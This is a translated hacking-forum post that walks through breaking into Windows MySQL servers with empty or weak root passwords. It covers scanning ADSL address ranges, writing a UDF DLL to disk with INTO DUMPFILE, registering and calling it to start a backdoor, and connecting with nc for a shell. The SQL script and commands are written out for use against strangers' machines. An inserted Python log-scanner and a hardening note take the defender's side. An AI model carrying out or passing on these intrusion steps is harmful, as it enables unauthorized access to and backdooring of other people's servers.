Getting SYSTEM privileges from a weak MySQL password in practice_Vulnerability Research

Getting Windows SYSTEM privileges from a weak MySQL password in practice

In May this year mix published an article about MySQL intrusion on the ph4nt0m forum (<<Executing system commands as SYSTEM through MySQL on Windows>>, link: http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006), and the response was strong. Shortly afterwards 古典辣m of Hacker Base made a demo animation, but unfortunately the mysql.txt it used was never published, so many people unfamiliar with MySQL could not carry out the MySQL intrusion in practice.

In fact, executing arbitrary commands by registering a self-written Function from a MySQL UDF DLL was already published last December; see http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=33331. What mix achieved, sending a binary file directly from the MySQL client onto the server's hard disk, has to be called a remarkable discovery! Below I describe my own real-world intrusion!

1. Open hscan1.2 and scan a range of IPs. I recommend scanning the IP ranges used by ADSL, because the owners of those IPs have poor security awareness, so you can find many MySQL servers whose root password is empty and which allow access to MySQL's default mysql database.

2. Install MySQL for Windows on your own machine. Download address: http://download.pchome.net/internet/server/dbserver/2506.html

3. Download my_udf.dll or mix.dll from the ph4nt0m forum (I prefer my_udf.dll, because mix.dll makes MySQL hang).

4. Run WinHex, open my_udf.dll, and under the Edit menu click Copy All and choose Hex Values; open Notepad and click Paste, and the hexadecimal form of my_udf.dll is now copied in!

5. Open another Notepad and write the following statements:

use mysql;
set @a=concat('',0x...);   -- 0x... is replaced by the hex dump of the DLL in step 6
create table Mix(data LONGBLOB);
insert into Mix values("");update Mix set data = @a;
select data from Mix into DUMPFILE 'c:\\my_udf.dll';   -- writes the DLL onto the server's disk
create FUNCTION my_udfdoor RETURNS STRING SONAME 'c:\\my_udf.dll';   -- registers the DLL as a UDF
select my_udfdoor('');   -- calls the UDF, which starts the backdoor

6. Copy the hexadecimal data from the Notepad of step 4 and use it to replace the "..." in the second statement of step 5, then save the file in the root of drive C with the name mysql.txt.

7. Open a DOS command window locally, change to the MySQL installation directory, and type mysql -h218.1.1.1 -uroot -p123 (note: replace 218.1.1.1, root and 123 with the ip, username and password values that your hscan scan found; if the password is empty, the -p parameter is not needed);

8. If the connection to the remote MySQL server in step 7 succeeds, type \. c:\mysql.txt and press Enter. If the remote MySQL is running on Windows and the MySQL account you scanned has high enough privileges, your backdoor will be installed on the remote server.

9. Finally, use nc to connect to port 3306 of this server, type the password fuck and press Enter; if no shell appears, press Enter a few more times. If there is still no shell, try another target.
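As an added example (not part of the original post, and not code from mix or the ph4nt0m forum): a Python check from the defender's side that walks MySQL general-log lines for the write-then-load sequence in the mysql.txt above and reports whether the stages chain together. The log excerpt, the host 203.0.113.9 and the thread id are constructed; secure_file_priv_risk reads the value of the server variable of that name.

```python
import re
from dataclasses import dataclass

# Regexes for the three stages of the write-then-load sequence above:
# a large hex literal (the staged DLL), INTO DUMPFILE (server-side file write)
# and CREATE FUNCTION ... SONAME (loading that file as a UDF).
HEX_BLOB = re.compile(r"0x[0-9A-Fa-f]{256,}")
DUMPFILE = re.compile(r"INTO\s+DUMPFILE\s+'([^']+)'", re.I)
SONAME = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+"
    r"RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)


@dataclass
class Finding:
    line_no: int
    stage: str
    detail: str
    linked: bool = False  # True when this stage builds on an earlier finding


def _norm(path):
    """Normalise a Windows path as written in an SQL literal ('c:\\\\x.dll')."""
    return re.sub(r"[\\/]+", lambda _: "\\", path).lower()


def scan_general_log(lines):
    """Return the suspicious stages found in general-log lines, in log order."""
    findings, dumped, registered = [], set(), []
    for n, line in enumerate(lines, 1):
        m = HEX_BLOB.search(line)
        if m:
            is_pe = m.group(0)[2:6].upper() == "4D5A"  # "MZ": a PE image
            findings.append(Finding(n, "staged_blob",
                "PE image in SQL literal" if is_pe else "large binary literal"))
            continue
        m = DUMPFILE.search(line)
        if m:
            dumped.add(_norm(m.group(1)))
            findings.append(Finding(n, "dumpfile_write", f"file written: {m.group(1)}",
                                    linked=any(f.stage == "staged_blob" for f in findings)))
            continue
        m = SONAME.search(line)
        if m:
            name, lib = m.group(1), m.group(2)
            registered.append(name)
            findings.append(Finding(n, "udf_register", f"{name} loaded from {lib}",
                                    linked=_norm(lib) in dumped))
            continue
        for name in registered:  # a call to a UDF registered earlier in this log
            if re.search(rf"\b{re.escape(name)}\s*\(", line, re.I):
                findings.append(Finding(n, "udf_call", f"{name}() executed", linked=True))
                break
    return findings


def secure_file_priv_risk(value):
    """Describe what a secure_file_priv setting leaves open for INTO DUMPFILE."""
    if value is None or value == "":
        return "high: INTO DUMPFILE may write anywhere the server account can"
    if value.upper() == "NULL":
        return "none: file import/export disabled"
    return f"reduced: writes confined to {value}"


# Constructed general-log excerpt mirroring the mysql.txt statements above;
# the hex literal is a stub (MZ header plus zero padding), not a real DLL.
SAMPLE_BLOB = "0x4D5A90000300000004000000FFFF0000B8" + "00" * 300
SAMPLE_LOG = [
    "   3 Connect   root@203.0.113.9 on mysql",
    "   3 Query     use mysql",
    "   3 Query     set @a=concat('', " + SAMPLE_BLOB + ")",
    "   3 Query     create table Mix(data LONGBLOB)",
    "   3 Query     update Mix set data = @a",
    r"   3 Query     select data from Mix into DUMPFILE 'c:\\my_udf.dll'",
    r"   3 Query     create FUNCTION my_udfdoor RETURNS STRING SONAME 'c:\\my_udf.dll'",
    "   3 Query     select my_udfdoor('')",
]

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.stage:14} {f.detail}" + (" [chained]" if f.linked else ""))
    print(secure_file_priv_risk(""))
```

On MySQL 5.1 and later SONAME libraries are loaded only from plugin_dir, and a non-empty secure_file_priv confines INTO DUMPFILE to one directory, so checking both settings and auditing mysql.func for unexpected entries is the matching hardening step.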

Below I paste the contents of the mysql.txt from my machine so everyone can get going right away! But the backdoor password is not fuck; I changed it to ping.

Everyone is welcome to visit my little site http://www.hackercradle.com/. My QQ groups are 2762695 and 9207339; welcome to join!


Time: 2024-10-31 01:58:51
